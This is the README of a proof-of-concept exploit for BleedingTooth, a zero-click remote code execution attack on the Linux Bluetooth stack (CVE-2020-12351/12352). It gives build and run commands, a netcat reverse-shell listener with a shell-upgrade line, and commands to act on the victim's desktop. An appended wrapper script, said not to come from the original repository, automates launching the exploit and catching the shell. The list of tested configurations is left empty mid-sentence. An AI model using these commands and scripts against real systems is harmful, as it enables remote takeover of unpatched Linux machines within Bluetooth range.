
BleedingTooth: Linux Bluetooth Zero-Click Remote Code Execution

This Proof-Of-Concept demonstrates the exploitation of CVE-2020-12351 and CVE-2020-12352.

Technical details

Technical details about the exploit are available in writeup.md.

Usage

Compile it (the BlueZ development headers are required for -lbluetooth, i.e. the libbluetooth-dev package on Ubuntu) using:

$ gcc -o exploit exploit.c -lbluetooth

and execute it as:

$ sudo ./exploit target_mac source_ip source_port

where target_mac is the Bluetooth address of the victim, and source_ip and source_port are the attacker-side address and port that the payload connects back to. source_ip must therefore be reachable from the target, and source_port must be the same port that the listener below waits on.

In another terminal, start the listener before launching the exploit, and once the connection arrives type the second line into the nc session to upgrade it to an interactive shell:

$ nc -lvp 1337
exec bash -i 2>&0 1>&0

If successful, a calculator can be spawned on the victim's desktop with the following (the Xauthority path assumes a GDM session for uid 1000; adjust it for other users or display managers):

export XAUTHORITY=/run/user/1000/gdm/Xauthority
export DISPLAY=:0
gnome-calculator
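The whole procedure above as a single wrapper script, added here as an example and not part of the BleedingTooth repository: it validates the arguments, derives the attacker IP from the routing table when none is given (assumes iproute2 `ip`, nc and sudo are installed), starts the exploit after a short delay so the listener is already up when the payload connects back, and keeps nc in the foreground so the reverse shell stays interactive. The helper names (validate_mac, validate_port, validate_ipv4, local_ip_for, run_attack) are this example's own.

```shell
#!/bin/sh
# Added wrapper for the PoC usage above (example code, not part of the
# BleedingTooth repository). Keeps the listener port and the exploit's
# source_port identical and runs nc in the foreground (interactive stdin).
set -eu

# 0 if $1 is a colon-separated 48-bit Bluetooth address (e.g. AA:BB:CC:DD:EE:FF).
validate_mac() {
    printf '%s\n' "$1" | grep -Eq '^([0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$'
}

# 0 if $1 is a TCP port number in 1..65535.
validate_port() {
    printf '%s\n' "$1" | grep -Eq '^[0-9]{1,5}$' && [ "$1" -ge 1 ] && [ "$1" -le 65535 ]
}

# 0 if $1 is a dotted-quad IPv4 address with every octet in 0..255.
validate_ipv4() {
    printf '%s\n' "$1" | grep -Eq '^([0-9]{1,3}\.){3}[0-9]{1,3}$' || return 1
    oldifs=$IFS; IFS=.
    for o in $1; do
        if [ "$o" -gt 255 ]; then IFS=$oldifs; return 1; fi
    done
    IFS=$oldifs
    return 0
}

# IPv4 address this host would use to reach $1 (default 1.1.1.1); assumes iproute2.
local_ip_for() {
    ip -4 route get "${1:-1.1.1.1}" 2>/dev/null |
        awk '{ for (i = 1; i <= NF; i++) if ($i == "src") { print $(i + 1); exit } }'
}

# run_attack <target_mac> <listen_port> [source_ip]
run_attack() {
    mac=$1; port=$2; src=${3:-}
    validate_mac "$mac"   || { echo "bad target MAC: $mac" >&2; return 2; }
    validate_port "$port" || { echo "bad port: $port" >&2; return 2; }
    [ -n "$src" ] || src=$(local_ip_for)
    validate_ipv4 "$src"  || { echo "no usable source IP (got '$src')" >&2; return 2; }
    [ -x ./exploit ] || { echo "build first: gcc -o exploit exploit.c -lbluetooth" >&2; return 2; }
    command -v nc >/dev/null 2>&1 || { echo "nc not found" >&2; return 2; }

    sudo -v   # cache credentials now so the backgrounded sudo below does not prompt
    # The payload connects back to src:port, so the listener must be up first:
    # delay the exploit slightly and keep nc in the foreground.
    ( sleep 1; sudo ./exploit "$mac" "$src" "$port" ||
        echo "exploit exited with status $? (the README estimates ~80% success)" >&2 ) &
    echo "listening on $src:$port; when the shell connects, type: exec bash -i 2>&0 1>&0"
    nc -lvp "$port"
}

# Invoke only when arguments are given, so the file can also be sourced for its helpers.
[ $# -eq 0 ] || run_attack "$@"
```

Run it as `sh wrapper.sh AA:BB:CC:DD:EE:FF 1337` from the directory containing the compiled exploit; pass a third argument to override the auto-detected source IP when the target sits on a different interface than the default route.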

This Proof-Of-Concept has been tested against a Dell XPS 15 running Ubuntu 20.04.1 LTS with:

The success rate of the exploit is estimated at 80%.

Credits

Andy Nguyen (theflow@)